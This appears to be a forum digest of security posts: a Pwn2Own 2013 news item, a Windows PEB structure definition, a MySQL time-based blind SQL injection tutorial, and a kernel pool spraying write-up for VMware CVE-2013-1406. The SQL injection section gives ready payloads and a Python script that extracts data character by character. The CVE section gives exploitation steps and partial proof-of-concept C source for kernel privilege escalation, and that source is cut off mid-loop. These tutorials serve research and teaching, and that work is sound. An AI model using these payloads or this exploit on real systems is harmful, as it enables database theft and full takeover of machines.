13. [h=1]Major Browsers, Java Hacked on the First Day of Pwn2Own 2013[/h]March 7th, 2013, 14:04 GMT · By Eduard Kovacs Considering the large amounts of money being offered at Pwn2Own 2013, we shouldn’t be surprised that most of the web browsers were hacked on the first day of the competition, held these days in Canada as part of the CanSecWest conference. So far, Firefox, Internet Explorer 10, Java and Chrome have been broken by the contestants. French security firm VUPEN announced breaking Internet Explorer 10 on Windows 8, Firefox 19 on Windows 7, and Java. “We've pwned MS Surface Pro with two IE10 zero-days to achieve a full Windows 8 compromise with sandbox bypass,” VUPEN wrote on Twitter. “We've pwned Firefox using a use-after-free and a brand new technique to bypass ASLR/DEP on Win7 without the need of any ROP,” the company said two hours later. It appears they hacked Java by leveraging a “unique heap overflow as a memory leak to bypass ASLR and as a code execution.” “ALL our 0days & techniques used at #Pwn2own have been reported to affected software vendors to allow them issue patches and protect users,” VUPEN said. Experts from MWR Labs have managed to demonstrate a full sandbox bypass exploit against the latest stable version of Chrome. “By visiting a malicious webpage, it was possible to exploit a vulnerability which allowed us to gain code execution in the context of the sandboxed renderer process,” MWR Labs representatives wrote. “We also used a kernel vulnerability in the underlying operating system in order to gain elevated privileges and to execute arbitrary commands outside of the sandbox with system privileges.” Java was also “pwned” by Josh Drake of Accuvant Labs and James Forshaw of Contextis. Currently, VUPEN is working on breaking Flash, Pham Toan is attempting to hack Internet Explorer 10, and the famous George Hotz is taking a crack at Adobe Reader. Source: Major Browsers, Java Hacked on the First Day of Pwn2Own 2013 - Softpedia
14. [h=2]Evolution of Process Environment Block (PEB)[/h]March 2, 2013 / ReWolf Over a year ago I published a unified definition of the PEB for x86 and x64 Windows (PEB32 and PEB64 in one definition). It was based on the PEB taken from Windows 7 NTDLL symbols, but I was pretty confident that it should work on other versions of Windows as well. Recently someone left a comment under the mentioned post: “Good, but is it only for Windows 7?” It made me curious whether it really is only for Win7. I was expecting that there might be some small differences between some field names, or maybe some new fields added at the end, but that the overall structure should be the same. I had no choice but to check it myself. I collected 108 different ntdll.pdb/wntdll.pdb files from various versions of Windows and dumped the _PEB structure from them (Dia2Dump ftw!). Here are some statistics: _PEB was defined in 80 different PDBs (53 x86 PEBs and 27 x64 PEBs) There were 11 unique PEBs for x86, and 8 unique PEBs for x64 (those numbers don't add up, as starting from Windows 2003 SP1 there is always a match between the x86 and x64 versions) The total number of collected different _PEB definitions is equal to 11 I've put all the collected information into a nice table (click the picture to open the PDF): PEB Evolution PDF The left column of the table represents the x86 offset, the right column is the x64 offset, green fields are supposed to be compatible across all Windows versions starting from XP without any SP and ending at Windows 8 RTM, red (pink?, rose?) fields should be used only after carefully verifying that they work on a target system. At the top of the table, there is a row called NTDLL TimeStamp; it is not the timestamp from the PE header but from the Debug Directory (IMAGE_DIRECTORY_ENTRY_DEBUG, LordPE can parse this structure). I'm using this timestamp as a unique identifier for the NTDLL version; this timestamp is also stored in PDB files.
Now I can answer the initial question: “Is my previous PEB32/PEB64 definition wrong?” Yes and no. Yes, because it contains various fields specific to Windows 7, thus it can be considered wrong. No, because most of the fields are exactly the same across all Windows versions, especially those fields that are usually used in third-party software. To satisfy everyone, I've prepared another version of the PEB32/PEB64 definition:

#pragma pack(push)
#pragma pack(1)

template <class T>
struct LIST_ENTRY_T {
    T Flink;
    T Blink;
};

template <class T>
struct UNICODE_STRING_T {
    union {
        struct {
            WORD Length;
            WORD MaximumLength;
        };
        T dummy;
    };
    T _Buffer;
};

template <class T, class NGF, int A>
struct _PEB_T {
    union {
        struct {
            BYTE InheritedAddressSpace;
            BYTE ReadImageFileExecOptions;
            BYTE BeingDebugged;
            BYTE _SYSTEM_DEPENDENT_01;
        };
        T dummy01;
    };
    T Mutant;
    T ImageBaseAddress;
    T Ldr;
    T ProcessParameters;
    T SubSystemData;
    T ProcessHeap;
    T FastPebLock;
    T _SYSTEM_DEPENDENT_02;
    T _SYSTEM_DEPENDENT_03;
    T _SYSTEM_DEPENDENT_04;
    union {
        T KernelCallbackTable;
        T UserSharedInfoPtr;
    };
    DWORD SystemReserved;
    DWORD _SYSTEM_DEPENDENT_05;
    T _SYSTEM_DEPENDENT_06;
    T TlsExpansionCounter;
    T TlsBitmap;
    DWORD TlsBitmapBits[2];
    T ReadOnlySharedMemoryBase;
    T _SYSTEM_DEPENDENT_07;
    T ReadOnlyStaticServerData;
    T AnsiCodePageData;
    T OemCodePageData;
    T UnicodeCaseTableData;
    DWORD NumberOfProcessors;
    union {
        DWORD NtGlobalFlag;
        NGF dummy02;
    };
    LARGE_INTEGER CriticalSectionTimeout;
    T HeapSegmentReserve;
    T HeapSegmentCommit;
    T HeapDeCommitTotalFreeThreshold;
    T HeapDeCommitFreeBlockThreshold;
    DWORD NumberOfHeaps;
    DWORD MaximumNumberOfHeaps;
    T ProcessHeaps;
    T GdiSharedHandleTable;
    T ProcessStarterHelper;
    T GdiDCAttributeList;
    T LoaderLock;
    DWORD OSMajorVersion;
    DWORD OSMinorVersion;
    WORD OSBuildNumber;
    WORD OSCSDVersion;
    DWORD OSPlatformId;
    DWORD ImageSubsystem;
    DWORD ImageSubsystemMajorVersion;
    T ImageSubsystemMinorVersion;
    union {
        T ImageProcessAffinityMask;
        T ActiveProcessAffinityMask;
    };
    T GdiHandleBuffer[A];
    T PostProcessInitRoutine;
    T TlsExpansionBitmap;
    DWORD TlsExpansionBitmapBits[32];
    T SessionId;
    ULARGE_INTEGER AppCompatFlags;
    ULARGE_INTEGER AppCompatFlagsUser;
    T pShimData;
    T AppCompatInfo;
    UNICODE_STRING_T<T> CSDVersion;
    T ActivationContextData;
    T ProcessAssemblyStorageMap;
    T SystemDefaultActivationContextData;
    T SystemAssemblyStorageMap;
    T MinimumStackCommit;
};

typedef _PEB_T<DWORD, DWORD64, 34> PEB32;
typedef _PEB_T<DWORD64, DWORD, 30> PEB64;

#pragma pack(pop)

The above version is system-independent, as all fields that change across OS versions are marked as _SYSTEM_DEPENDENT_xx. I've also removed all fields from the end that were added after Windows XP. Source: Evolution of Process Environment Block (PEB)
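As a quick sanity check on the template above, the leading fields can be mirrored with Python's ctypes and the well-known offsets verified on any platform. This sketch covers only the first few fields (the `_pad` array stands in for the `union { struct {...}; T dummy01; }` at the top):

```python
import ctypes

def make_peb_prefix(ptr_type):
    """Mirror of the leading _PEB_T fields, for offset checking only."""
    class PEB_PREFIX(ctypes.Structure):
        _pack_ = 1  # matches #pragma pack(1)
        _fields_ = [
            ("InheritedAddressSpace",    ctypes.c_ubyte),
            ("ReadImageFileExecOptions", ctypes.c_ubyte),
            ("BeingDebugged",            ctypes.c_ubyte),
            ("SystemDependent01",        ctypes.c_ubyte),
            # Padding so the leading union occupies sizeof(T) bytes total.
            ("_pad",                     ctypes.c_ubyte * (ctypes.sizeof(ptr_type) - 4)),
            ("Mutant",                   ptr_type),
            ("ImageBaseAddress",         ptr_type),
            ("Ldr",                      ptr_type),
            ("ProcessParameters",        ptr_type),
        ]
    return PEB_PREFIX

PEB32 = make_peb_prefix(ctypes.c_uint32)
PEB64 = make_peb_prefix(ctypes.c_uint64)
print(hex(PEB32.ImageBaseAddress.offset), hex(PEB64.ImageBaseAddress.offset))
# 0x8 0x10
```

The printed offsets (ImageBaseAddress at 0x8 on x86 and 0x10 on x64, BeingDebugged at 0x2 on both) match the values published in the PEB evolution table.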
15. [h=3]MySQL Injection Time Based[/h]We have already written a couple of posts on SQL Injection techniques, such as "SQL Injection Union Based", "Blind SQL Injection" and last but not least "Common problems faced while performing SQL Injection". However, how could the series miss the "Time based SQL injection" technique? @yappare has come up with another excellent post, which explains how this attack can be used to perform a wide variety of attacks. Over to @yappare. Hey everyone! It's another post by me, @yappare. As I previously promised Mr Rafay that I would write a tutorial for RHA on the MySQL time-based technique, here's a simple tutorial on MySQL Time Based SQLi. Before that, as usual, here are some good references for those interested in SQLi: Time-Based Blind SQL Injection with Heavy Queries and of course the greatest cheatsheet, Cheat Sheets | pentestmonkey. OK, back to our testing machine. In this example I'll use the OWASP WebApps vulnerable machine, tested on the Peruggia application. Let's go! Previously, we already knew that this parameter, pic_id, is vulnerable to SQLi. So, let's say we want to use a time-based attack on this vulnerable parameter; here's what we are going to do. But first, do note that in MySQL, for time-based SQLi, we are going to use the SLEEP() function. Each DBMS has a different function to use, but the steps are usually quite similar: in MSSQL we use WAITFOR DELAY, in PostgreSQL we use PG_SLEEP(), and so on. Do check them on the pentestmonkey cheatsheet. Back to our testing. So let's check whether a time-based attack can be performed on the parameter or not. Test it using this command: pic_id=13 and sleep(5)-- As we can see from the image above, there's a difference between the requests. The 1st one is a normal request where the response time is 0 sec, while in the 2nd request I included the SLEEP() command, so the server took 5 seconds to respond. So from here we know that it can be attacked via time-based injection as well. Let's proceed to check the current user.
Here's the command that we are going to use:

pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--

From this query, if the current user's 1st character is equal to 'a', the server will sleep for 5 seconds before responding. If not, the server will respond at its normal response time. Then you proceed to test other characters. From the image above we can clearly see that for the 1st and 2nd requests the server responded in 0 seconds, while for the 3rd request the server delayed for 5 seconds. Why? Because the 1st character of the current user starts with 'p', not 'a' or 'h'. Then you can proceed to check its 2nd character and so on:

pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--
pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--

And so on. Then go on with table_name guessing:

pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

The 1st request is FALSE, because the server response is 0 seconds: no table named 'user' exists. For the 2nd request the server delayed for 5 seconds, so a table named 'users' does exist! How about guessing the column_name? It's easy:

pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

See the image above? Still need any explanation? I bet you guys already understand it! Get-the-data mode!

pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--

So, if the 1st character of the data in the right column_name in the right table_name is 'a', the server will delay for 5 seconds. Then proceed to test the 2nd, 3rd char and so on. The image shows that the username is 'admin'. So is it correct? Let's double check it. Yeah, it's correct. That's all for now! Thanks, @yappare Source: MySQL Injection Time Based | Learn How To Hack - Ethical Hacking and security tips
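The char-by-char loop described above automates naturally. A sketch of the extraction logic follows; `fake_oracle` simulates the server's response time instead of issuing real HTTP requests, and the simulated user `peruggia@localhost` is an illustrative value, not taken from the post:

```python
import re
import string

CHARSET = string.ascii_lowercase + string.digits + "_@."
DELAY = 5  # seconds the server sleeps when the injected condition is TRUE

def extract(timing_oracle, max_len=32):
    """Extract a string via a time-based blind oracle, one character per probe.

    timing_oracle(payload) must return the observed response time in seconds
    for a request like: pic_id=13 and if(substring(user(),i,1)='c',sleep(5),1)--
    """
    result = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            payload = (f"13 and if(substring(user(),{pos},1)="
                       f"'{ch}',sleep({DELAY}),1)-- ")
            if timing_oracle(payload) >= DELAY:
                result += ch
                break
        else:
            break  # no character matched: end of string reached
    return result

def fake_oracle(payload, secret="peruggia@localhost"):
    """Stand-in for a real request: returns DELAY when the condition is TRUE."""
    m = re.search(r"substring\(user\(\),(\d+),1\)='(.)'", payload)
    pos, ch = int(m.group(1)), m.group(2)
    return DELAY if pos <= len(secret) and secret[pos - 1] == ch else 0

print(extract(fake_oracle))  # peruggia@localhost
```

In a real engagement, `timing_oracle` would time an HTTP request carrying the payload; using a threshold comfortably above normal latency (and retrying borderline results) keeps network jitter from producing wrong characters.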
16. [h=3]Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406[/h]Author: Artem Shishkin, Positive Research. If you deal with Windows kernel vulnerabilities, it is likely that you'll have to deal with the kernel pool in order to develop an exploit. I guess it is useful to learn how to keep the behavior of this kernel entity under your control. In this article I will try to give a high-level overview of kernel pool internals. This object has already been deeply researched several times, so if you need more technical information, please google it or use the references at the end of this article. Kernel pool structure overview The kernel pool is the common place for allocating memory in the operating system kernel. Remember that stacks are very small in the kernel environment; they are suitable only for a small bunch of local non-array variables. Once a driver needs to create a large data structure or a string, it will certainly use pool memory. There are different types of pools, but all of them have the same structure (except for the driver verifier's special pool). Every pool has a special control structure called a pool descriptor. Among other purposes, it maintains lists of free pool chunks, which represent the free pool space. A pool itself consists of memory pages. They can be standard 4 KB or large 1 MB in size. The number of pages used for the pool is dynamically adjusted. Kernel pool pages are then split into chunks. These are the exact chunks that drivers are given when requesting memory from the pool. Pool chunk on x86 systems Pool chunks carry the following meta-information: 1. Previous size — the size of the preceding chunk. 2. The pool index field is used for situations with more than one pool of a certain type. For example, there are multiple paged pools in the system. This field identifies which exact paged pool this chunk belongs to. 3. Block size is the size of the current chunk.
Just like the previous size field, the size is encoded as (pool chunk data size + size of pool header + optional 4 bytes of a pointer to the process charged quota) >> 3 (or >> 4 on x64 systems). 4. The pool type field is a flag bitmask for the current chunk. Notice that these flags are not officially documented. T (Tracked): this chunk is tracked by the driver verifier. Pool tracking is used for debugging purposes. S (Session): the chunk belongs to the paged session pool, a special pool used for session-specific allocations. Q (Quota): the chunk takes part in the quota management mechanism. This flag is only relevant for 32-bit systems. If this flag is present, a pointer to the process charged quota for this chunk is stored at the end of the chunk. U (In use): this chunk is currently in use. By contrast, a chunk can be free, which means that we can allocate memory from it. This flag is the third bit on pre-Vista systems and the second on Vista and later. B (Base pool) identifies the pool which the chunk belongs to. There are two base pools – paged and non-paged. The non-paged pool is encoded as 0 and the paged pool as 1. On pre-Vista systems this flag could occupy two bits because the base pool type was encoded as (base pool type + 1), that is binary 10 for the paged pool and 1 for the non-paged pool. 5. The pool tag is used for debugging purposes. Drivers specify a four-byte character signature which identifies the subsystem or driver that uses this chunk. For example the “NtFs” tag means that the chunk belongs to the ntfs.sys driver. Pool chunk on x64 systems There are a couple of differences on 64-bit systems. The first is a different size for the fields, and the second is a new 8-byte field with a pointer to the process charged quota for this chunk. Kernel pool memory allocation overview Imagine that the pool is empty. I mean there is no pool space at all.
If we try to allocate memory from the pool (let's say its size is less than 0xFF0), it will first allocate a memory page and then place a chunk of the requested size on it. Since it is the first allocation on this page, the chunk will be placed at the start of the page. The first pool chunk allocation sequence This page now has two pool chunks — the one that we allocated and a free one. The free chunk can now be used for subsequent allocations. But from this moment the pool allocator tends to place new chunks at the end of the page, or of the free space within this page. Pool chunk allocation strategy When it comes to deallocation of the chunks, the process is repeated in reverse order. The chunks become free, and they are merged if they are adjacent. Pool deallocation strategy The whole situation with empty pools is just a fantasy, because the pools are already charged with memory pages by the time we can actually use them. Controlling the behavior of chunk allocations Let's keep in mind the fact that the kernel pool is a heavily used object. First of all it is used for creating all sorts of kernel objects and private kernel and driver structures. Secondly, the kernel pool takes part in a number of system calls, providing a buffer for the corresponding parameters. Since the computer is constantly servicing hardware by means of drivers and software by means of system calls, you can imagine the rate of kernel pool usage even when the system stays idle. Sooner or later the kernel pool becomes fragmented. This happens because allocations of different sizes and frees follow in a different order. This is the origin of the "spraying" term — when sequentially allocating pool chunks, those chunks do not necessarily follow each other; they are most likely located at completely different places in memory. So, when filling the pool memory with controlled red-painted chunks we are likely going to see the left side of the picture, then the right one.
Heap spraying leads to the left picture, not the right one. But there is an important exploitation-relevant circumstance: when there is no black region left for painting, we'll get a new black region without strangers' spots. From this point our spray becomes an ordinary brush with a solid color fill. From here we have a considerable level of control over the behavior of chunk allocation and the picture of the pool. We say considerable because we are still not guaranteed to be the painting master: our painting process can be interrupted by someone else spilling a different color. The spraying becomes filling when using a lot of objects. Depending on the type of object that we are using for spraying, we are able to create free windows of a needed size by freeing a number of objects that we created before. And the most important fact that allows us to make a controlled allocation is that the pool allocator tends to be as fast as possible. In order to use the processor cache effectively, the last freed pool chunk will be the first one allocated! This is the point of the controlled allocation, because we can guess the address of the chunk to be allocated. Of course the size of the allocation matters. That's why we have to calculate the size of the free-chunks window. If we have to allocate a 0x315-byte chunk, and we are spraying 0x20-byte chunks, we have to free 0x315 / 0x20 = (0x18 + 1) = 0x19 chunks. I hope this is clear enough. Here are some points we need to consider in order to be successful at kernel pool spraying: 1. If you don't have an opportunity to allocate in the kernel pool with some sort of target driver, you can always use Windows objects as spraying objects. Since Windows objects naturally are objects of the operating system kernel, they are stored in the kernel pools. For the non-paged pool you can use processes, threads, events, semaphores, mutexes etc.
For the paged pool you can use directory objects, key objects, section objects (also known as file mappings) etc. For the session pool you can use any GDI or USER object: palettes, DCs, brushes etc. In order to free the memory occupied by those objects, you simply close all open handles to them. 2. By the time we start spraying there are pages available for pool usage, but they are too fragmented. If we need a space filled sequentially with controlled chunks, we need to spam the pool so there is no place left on the currently available pages. After this we'll get a new clean page, giving a chance of sequential allocation of controlled chunks. In a nutshell, create lots of spraying objects. 3. When calculating the necessary window size, keep in mind that the chunk header size matters; also, the whole size is rounded up to 8 and 16 bytes on x86 and x64 machines respectively. 4. Although we are able to control the manner of allocation of the pool chunks, it is difficult to predict the relative positions of the sprayed objects. If you use Windows objects for spraying, thus having only the handle of an object but not its address, you can leak kernel object addresses using the NtQuerySystemInformation() function with the SystemExtendedHandleInformation class. It will provide all the information needed for precise spraying. 5. Keep the quantity of sprayed objects balanced. You'll probably fail to control chunk allocation when there is no memory left in the system at all. 6. One of the tricks that might help you improve the reliability of kernel-pool-based exploits is assigning a high priority to the spraying and triggering thread. Since there is a race for the pool memory, it is useful to gain more chances to execute than the other threads in the system. It will help keep your spraying more consistent.
Also consider the gap between spraying and triggering the vulnerability: the smaller it is, the better the chance you get to land on the controlled pool chunk. VMware CVE-2013-1406 A couple of weeks ago an interesting advisory by VMware was published. It promised local privilege escalation on both host and guest systems, thus leading to a double ownage. The vulnerable component was vmci.sys. VMCI stands for Virtual Machine Communication Interface; it is used for fast and efficient communication between guest virtual machines and their host server. VMCI presents a custom socket type implemented as a Windows Socket Service Provider in the vsocklib.dll library. The module vmci.sys creates a virtual device that implements the needed functionality. This driver is always running on the host system. As for guest systems, VMware Tools have to be installed in order to use VMCI. When writing an overview it would be nice to explain the high-level logic of the vulnerability in order to present a detective-like story. Unfortunately this is not the case here, because there is not much public information about the VMCI implementation. I don't think that people who exploit vulnerabilities always go deep into the details of reverse engineering the whole target system. It is more profitable to obtain a stable working exploit within a week than high-level knowledge of how things work in months. PatchDiff highlighted three patched functions. All of them were relevant to the same IOCTL code, 0x8103208C – something went terribly wrong with handling it. Control flow of the code processing the 0x8103208C IOCTL The third patched function was eventually called from both the first and the second ones. The third function is supposed to allocate a pool chunk of a requested size times 0x68 and initialize it with zeroes. It contained an internal structure for dispatching the request. The problem was that the chunk size was specified in the user buffer for this IOCTL and was not checked properly.
As a result, an internal structure was not allocated, which led to interesting consequences. A buffer is supplied for this IOCTL; its size is supposed to be 0x624 in order to reach the patched functions. To process the user request an internal structure is allocated; its size is 0x20C. Its first 4 bytes are filled with a value specified at [user_buffer + 0x10]. These exact bytes are used to allocate another internal structure, the pointer to which is then stored in the last four bytes of the first one. But no matter whether the second chunk was allocated or not, a sort of dispatch function was invoked.

.text:0001B2B4 ; int __stdcall DispatchChunk(PVOID pChunk)
.text:0001B2B4 DispatchChunk proc near        ; CODE XREF: PatchedOne+78
.text:0001B2B4                                ; UnsafeCallToPatchedThree+121
.text:0001B2B4
.text:0001B2B4 pChunk = dword ptr 8
.text:0001B2B4
.text:0001B2B4 000 mov     edi, edi
.text:0001B2B6 000 push    ebp
.text:0001B2B7 004 mov     ebp, esp
.text:0001B2B9 004 push    ebx
.text:0001B2BA 008 push    esi
.text:0001B2BB 00C mov     esi, [ebp+pChunk]
.text:0001B2BE 00C mov     eax, [esi+208h]
.text:0001B2C4 00C xor     ebx, ebx
.text:0001B2C6 00C cmp     eax, ebx
.text:0001B2C8 00C jz      short CheckNullUserSize
.text:0001B2CA 00C push    eax                ; P
.text:0001B2CB 010 call    ProcessParam       ; We won't get here
.text:0001B2D0
.text:0001B2D0 CheckNullUserSize:             ; CODE XREF: DispatchChunk+14
.text:0001B2D0 00C cmp     [esi], ebx
.text:0001B2D2 00C jbe     short CleanupAndRet
.text:0001B2D4 00C push    edi
.text:0001B2D5 010 lea     edi, [esi+8]
.text:0001B2D8
.text:0001B2D8 ProcessUserBuff:               ; CODE XREF: DispatchChunk+51
.text:0001B2D8 010 mov     eax, [edi]
.text:0001B2DA 010 test    eax, eax
.text:0001B2DC 010 jz      short NextCycle
.text:0001B2DE 010 or      ecx, 0FFFFFFFFh
.text:0001B2E1 010 lea     edx, [eax+38h]
.text:0001B2E4 010 lock xadd [edx], ecx
.text:0001B2E8 010 cmp     ecx, 1
.text:0001B2EB 010 jnz     short DerefObj
.text:0001B2ED 010 push    eax
.text:0001B2EE 014 call    UnsafeFire         ; BANG!!!!
.text:0001B2F3
.text:0001B2F3 DerefObj:                      ; CODE XREF: DispatchChunk+37
.text:0001B2F3 010 mov     ecx, [edi+100h]    ; Object
.text:0001B2F9 010 call    ds:ObfDereferenceObject
.text:0001B2FF
.text:0001B2FF NextCycle:                     ; CODE XREF: DispatchChunk+28
.text:0001B2FF 010 inc     ebx
.text:0001B300 010 add     edi, 4
.text:0001B303 010 cmp     ebx, [esi]
.text:0001B305 010 jb      short ProcessUserBuff
.text:0001B307 010 pop     edi
.text:0001B308
.text:0001B308 CleanupAndRet:                 ; CODE XREF: DispatchChunk+1E
.text:0001B308 00C push    20Ch               ; size_t
.text:0001B30D 010 push    esi                ; void *
.text:0001B30E 014 call    ZeroChunk
.text:0001B313 00C push    'gksv'             ; Tag
.text:0001B318 010 push    esi                ; P
.text:0001B319 014 call    ds:ExFreePoolWithTag
.text:0001B31F 00C pop     esi
.text:0001B320 008 pop     ebx
.text:0001B321 004 pop     ebp
.text:0001B322 000 retn    4
.text:0001B322 DispatchChunk endp

The dispatch function searched for pointers to process. The processing included dereferencing some object and calling some function if appropriate flags had been set inside the pointed-to structure. But since we failed to allocate the structure to process, the dispatch function slid beyond the end of the first chunk. When uncontrolled, this processing leads to an access violation and a subsequent BSOD. IOCTL dispatch structure and the dispatcher behavior So we've got possible code execution at a controlled address:

.text:0001B946 UnsafeFire proc near
.text:0001B946
.text:0001B946 arg_0 = dword ptr 8
.text:0001B946
.text:0001B946 000 mov     edi, edi
.text:0001B948 000 push    ebp
.text:0001B949 004 mov     ebp, esp
.text:0001B94B 004 mov     eax, [ebp+arg_0]
.text:0001B94E 004 push    eax
.text:0001B94F 008 call    dword ptr [eax+0ACh] ; BANG!!!!
.text:0001B955 004 pop     ebp
.text:0001B956 000 retn    4
.text:0001B956 UnsafeFire endp

Exploitation Since the chunk dispatch code slips beyond the chunk it is supposed to process, it meets the neighbor chunk or an unmapped page. If it falls into unmapped memory, a BSOD occurs.
But when it meets another pool chunk, it tries to process the pool header, interpreting it as a pointer. Consider an x86 system. The four bytes the dispatcher function tries to interpret as a pointer are the previous block size, the pool index, the current block size and the pool type flags. Since we know the size and the pool index used for the skipped chunk, we know the low word of the pointer: 0xXXXX0043 – 0x43 is the size of the skipped chunk, which becomes the previous-size field of its neighbor; 0x0 is the pool index, which is guaranteed to be 0, since the non-paged pool used for the skipped chunk is the only one in the system. Notice that if two adjacent chunks share the same pool page, they belong to the same pool type and index. The high word contains the block size, which we can't predict, and the pool type flags, which we can: B = 0 because the chunk is from the non-paged pool, U = 1 because the chunk is supposed to be in use, Q = 0/1 because the chunk might be charged quota, S = 0 because the pool is not the session one, T = 0 because pool tracking is likely disabled by default. The unused bits in the pool type field are equal to 0. So we've got the following memory windows, valid for Windows 7 and Windows 8: 0x04000000 – 0x06000000 for ordinary chunks, 0x14000000 – 0x16000000 for quota-charged chunks. Based on the provided information you can easily calculate the memory windows for Windows XP and alike. As you can see, those memory ranges belong to user space, so we are able to force the vulnerable dispatch function to execute shellcode that we provide. In order to perform arbitrary code execution we have to map the calculated regions and meet the requirements of the dispatch function: 1. Within [0x43 + 0x38] place a DWORD value of 1 in order to meet the requirements of the following code:

.text:0001B2E1 010 lea     edx, [eax+38h]
.text:0001B2E4 010 lock xadd [edx], ecx
.text:0001B2E8 010 cmp     ecx, 1

2.
Within [0x43 + 0xAC] place a pointer to the function to be called, or simply the address of the shellcode. 3. Within [0x43 + 0x100] place a pointer to a fake object to be dereferenced by the ObfDereferenceObject() function. Notice that the reference count is taken from the object header, which is located at a negative offset from the object itself, so be sure that this function is not going to land on an unmapped region. Also provide a suitable reference count so that ObfDereferenceObject() will not try to free the user-mode memory with functions that are not suited for that. 4. Repeat this pattern every 0x10000 bytes. Everything has been done right! Improving the reliability of the exploit Although we have developed a nice exploitation strategy, it is still unreliable. Consider the case when the chunk after the vulnerable one is free. It is difficult to guess the state of that chunk's fields. Although such a chunk forms a pointer that looks valid to the dispatch function (because it is not NULL), dispatching it will lead to a BSOD. The same is true for the case when the dispatch function slides onto an unmapped virtual address. Kernel pool spraying is very useful in this case. As a spraying object I chose semaphores, since they provide the closest chunk size to the one I needed. As a result this technique helped a lot in improving the stability of the exploit. Remember that Windows 8 has SMEP support, so it is a little bit more complicated to exploit due to the laziness of a shellcode developer. Writing base-independent code and bypassing SMEP is left as an exercise for the reader. As for x64 systems, the problem is that the pointer became 8 bytes in size. This means that the high DWORD of the pointer interpreted by the dispatch function falls on the pool chunk tag field. Since most drivers and kernel subsystems use ASCII symbols for tagging, the pointer falls into non-canonical address space, so it can't be used for exploitation.
By this time I was unable to find a solution to this problem. In the end, I hope this article was useful to you, and I'm sorry that I could not fit all the needed information into a couple of paragraphs. I wish you good luck in researching and exploiting for the sake of making things more secure.

Source Code:

/*
    CVE-2013-1406 exploitation PoC
    by Artem Shishkin,
    Positive Research,
    Positive Technologies,
    02-2013
*/

void __stdcall FireShell(DWORD dwSomeParam)
{
    EscalatePrivileges(hProcessToElevate);

    // Equate the stack and quit the cycle
#ifndef _AMD64_
    __asm
    {
        pop ebx
        pop edi
        push 0xFFFFFFF8
        push 0xA010043
    }
#endif
}

HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0)
{
    HANDLE hResult = 0;
    DWORD dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) &&
            (pHandleTable->Handles[i].Object == pObjectAddr))
        {
            hResult = pHandleTable->Handles[i].HandleValue;
            break;
        }
    }

    return hResult;
}

PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
    PVOID pResult = 0;
    DWORD dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) &&
            (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pResult = (HANDLE)pHandleTable->Handles[i].Object;
            break;
        }
    }

    return pResult;
}

void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
    DWORD dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) &&
            (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pHandleTable->Handles[i].Object = NULL;
            pHandleTable->Handles[i].HandleValue = NULL;
            break;
        }
    }

    return;
}

void PoolSpray()
{
    // Init used native API function
    lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    if (NtQuerySystemInformation == NULL)
    {
        printf("Such a fail...\n");
        return;
    }

    // Determine object size
    // xp:
    //const DWORD_PTR dwSemaphoreSize = 0x38;
    // 7:
    //const DWORD_PTR dwSemaphoreSize = 0x48;
    DWORD_PTR dwSemaphoreSize = 0;
    if (LOBYTE(GetVersion()) == 5)
    {
        dwSemaphoreSize = 0x38;
    }
    else if (LOBYTE(GetVersion()) == 6)
    {
        dwSemaphoreSize = 0x48;
    }

    unsigned int cycleCount = 0;
    while (cycleCount < 50000)
    {
        HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL);
        if (hTemp == NULL)
        {
            break;
        }
        ++cycleCount;
    }
    printf("\t[+] Spawned lots of semaphores\n");
    printf("\t[.] Initing pool windows\n");
    Sleep(2000);

    DWORD dwNeeded = 4096;
    NTSTATUS status = 0xFFFFFFFF;
    PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);
    while (true)
    {
        status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL);
        if (status != STATUS_SUCCESS)
        {
            dwNeeded *= 2;
            VirtualFree(pBuf, 0, MEM_RELEASE);
            pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE);
        }
        else
        {
            break;
        }
    }

    HANDLE hHandlesToClose[0x30] = {0};
    DWORD dwCurPID = GetCurrentProcessId();
    PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf;

    for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
